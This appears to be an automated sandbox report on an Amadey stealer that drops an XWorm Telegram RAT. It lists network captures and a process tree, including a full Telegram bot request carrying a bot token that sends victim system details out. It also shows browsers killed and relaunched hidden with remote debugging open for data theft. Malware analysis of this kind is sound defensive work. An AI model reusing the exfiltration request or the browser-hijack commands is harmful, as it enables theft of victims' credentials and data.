                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    Cookie: _C_ETH=1; USRLOC=; MUID=00AA082B214465520B5C1D15206D642A; _EDGE_S=F=1&SID=1E0A64B8A5A8631F16D67186A4B1627A; _EDGE_V=1; SM=T
                                                                                                                                                                                                                                                                                    2024-11-21 21:15:10 UTC983INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                    Content-Type: image/gif
                                                                                                                                                                                                                                                                                    Last-Modified: Wed, 16 Oct 2024 16:24:13 GMT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    ETag: "8d3dafd6e71fdb1:0"
                                                                                                                                                                                                                                                                                    Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                    P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                                    Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                    Set-Cookie: MUID=00AA082B214465520B5C1D15206D642A; domain=.msn.com; expires=Tue, 16-Dec-2025 21:15:10 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                                    Set-Cookie: SRM_M=00AA082B214465520B5C1D15206D642A; domain=c.msn.com; expires=Tue, 16-Dec-2025 21:15:10 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                    Set-Cookie: MR=0; domain=c.msn.com; expires=Thu, 28-Nov-2024 21:15:10 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                    Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Thu, 21-Nov-2024 21:25:10 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:15:09 GMT
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Content-Length: 42
                                                                                                                                                                                                                                                                                    2024-11-21 21:15:10 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                                                                                                                                    Data Ascii: GIF89a!,L;


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    18192.168.2.550152149.154.167.2204436120C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-21 21:18:47 UTC450OUTGET /bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=1470436579&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A6513EFE8757A60506E5F%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20EVTO372NG%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: api.telegram.org
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    2024-11-21 21:18:48 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:18:48 GMT
                                                                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                                                                    Content-Length: 441
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                                                                                                                    2024-11-21 21:18:48 UTC441INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 34 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 36 37 33 30 30 34 30 35 30 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 74 65 61 6c 65 72 42 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 63 68 61 6c 6c 61 53 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 34 37 30 34 33 36 35 37 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 48 20 4d 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 68 65 6e 63 68 61 6e 67 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 32 32 33 39 32 37 2c 22 74 65 78 74 22 3a 22 5c 75 32 36 32 30 20 5b 58 57 6f 72 6d 20
                                                                                                                                                                                                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":1340,"from":{"id":6673004050,"is_bot":true,"first_name":"StealerBot","username":"MachallaSBot"},"chat":{"id":1470436579,"first_name":"H M","username":"chenchang1","type":"private"},"date":1732223927,"text":"\u2620 [XWorm


                                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                                                                                    Start time:16:10:59
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                                                                                    Imagebase:0x6c0000
                                                                                                                                                                                                                                                                                    File size:1'927'680 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:6AED281D1464E3A53839BBD9E7190535
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2104456781.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.2063442890.0000000005110000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                                                                                                                    Start time:16:11:03
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                                                                                                                                                                                                                    Imagebase:0x7a0000
                                                                                                                                                                                                                                                                                    File size:1'927'680 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:6AED281D1464E3A53839BBD9E7190535
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2148194212.00000000007A1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2104419686.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                                                                    • Detection: 47%, ReversingLabs
                                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                                                                                                    Start time:16:11:04
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7a0000
                                                                                                                                                                                                                                                                                    File size:1'927'680 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:6AED281D1464E3A53839BBD9E7190535
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.2152067719.00000000007A1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.2111686046.0000000004B80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                                                                                                    Start time:16:12:00
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7a0000
                                                                                                                                                                                                                                                                                    File size:1'927'680 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:6AED281D1464E3A53839BBD9E7190535
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.2662182646.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                                                                                                    Start time:16:12:33
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\1008029001\samat.exe"
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff7e12c0000
                                                                                                                                                                                                                                                                                    File size:13'960'143 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:F74588FC6A3342296CBB881D87C17300
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                                                                    • Detection: 13%, ReversingLabs
                                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                                                                                                    Start time:16:12:35
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\1008029001\samat.exe"
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff7e12c0000
                                                                                                                                                                                                                                                                                    File size:13'960'143 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:F74588FC6A3342296CBB881D87C17300
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                                                                                                                    Start time:16:12:41
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "dxdiag /t C:\Users\user\AppData\Local\Bunny\Info.txt"
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff7fdd30000
                                                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:10
                                                                                                                                                                                                                                                                                    Start time:16:12:41
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                                                                                                                    Start time:16:12:41
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\dxdiag.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:dxdiag /t C:\Users\user\AppData\Local\Bunny\Info.txt
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff788390000
                                                                                                                                                                                                                                                                                    File size:272'384 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:19AB5AD061BF013EBD012D0682DF37E5
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:12
                                                                                                                                                                                                                                                                                    Start time:16:12:47
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\drivers\mstee.sys
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff678400000
                                                                                                                                                                                                                                                                                    File size:12'288 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:244C73253E165582DDC43AF4467D23DF
                                                                                                                                                                                                                                                                                    Has elevated privileges:
                                                                                                                                                                                                                                                                                    Has administrator privileges:
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                    Target ID:13
                                                                                                                                                                                                                                                                                    Start time:16:12:47
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\drivers\mskssrv.sys
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                                                                                                                                    Commandline:
                                                                                                                                                                                                                                                                                    Imagebase:
                                                                                                                                                                                                                                                                                    File size:34'816 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:26854C1F5500455757BC00365CEF9483
                                                                                                                                                                                                                                                                                    Has elevated privileges:
                                                                                                                                                                                                                                                                                    Has administrator privileges:
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                                                                                                                    Start time:16:12:52
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /F /IM chrome.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff7dbb40000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:15
                                                                                                                                                                                                                                                                                    Start time:16:12:52
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:16
                                                                                                                                                                                                                                                                                    Start time:16:12:52
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:17
                                                                                                                                                                                                                                                                                    Start time:16:12:53
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                    Target ID:18
                                                                                                                                                                                                                                                                                    Start time:16:12:53
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2008 --field-trial-handle=1964,i,6524152562037050844,4104416786767478461,262144 /prefetch:8
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:19
                                                                                                                                                                                                                                                                                    Start time:16:12:56
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /F /IM msedge.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff7dbb40000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:20
                                                                                                                                                                                                                                                                                    Start time:16:12:56
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:21
                                                                                                                                                                                                                                                                                    Start time:16:12:57
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:22
                                                                                                                                                                                                                                                                                    Start time:16:12:58
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2088 --field-trial-handle=1992,i,15396176104267076459,4576140029387064159,262144 /prefetch:3
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:23
                                                                                                                                                                                                                                                                                    Start time:16:12:58
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6a5670000
                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:24
                                                                                                                                                                                                                                                                                    Start time:16:12:58
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1824 --field-trial-handle=2088,i,16928911371051510587,15929168129410231478,262144 /prefetch:3
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:25
                                                                                                                                                                                                                                                                                    Start time:16:13:03
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                                                                    File size:55'320 bytes
